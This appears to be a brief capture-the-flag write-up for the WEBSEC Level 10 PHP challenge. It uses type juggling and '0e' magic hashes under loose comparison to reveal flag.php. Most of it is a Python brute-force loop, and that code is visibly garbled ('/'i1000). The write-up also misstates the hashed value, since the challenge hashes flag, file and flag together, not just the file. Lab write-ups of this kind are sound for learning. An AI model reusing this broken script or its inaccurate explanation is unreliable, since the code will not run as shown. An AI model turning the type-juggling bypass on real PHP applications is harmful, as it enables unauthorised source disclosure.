WEBSEC Level 10

Challenge description

Integrity without knowledge is weak and useless, and knowledge without integrity is dangerous and dreadful.

Initial analysis

$hash = substr (md5 ($flag . $file . $flag), 0, 8);echo '';if ($request == $hash) { show_source ($file);}

tl;dr

STEP 1: Find a value filesothattheMD5(file) == $request.[PHP Type juggling, connected by loose comparison (==)]

STEP 2: import sys import hashlib for i in range(10000000): val='.'+('/'i1000)+'/flag.php' mdhas=hashlib.md5(val).hexdigest() if mdhas[0:2]=='0e': print val sys.exit() [ "./" , ".//" , ".////" all function in the same manner ]

STEP 3: Input File -> val, Hash-> 0

OUTPUT:gives the flag

Flag

FLAG: `flag`

For further queries, please DM me on Twitter: https://twitter.com/gopika-subramanian.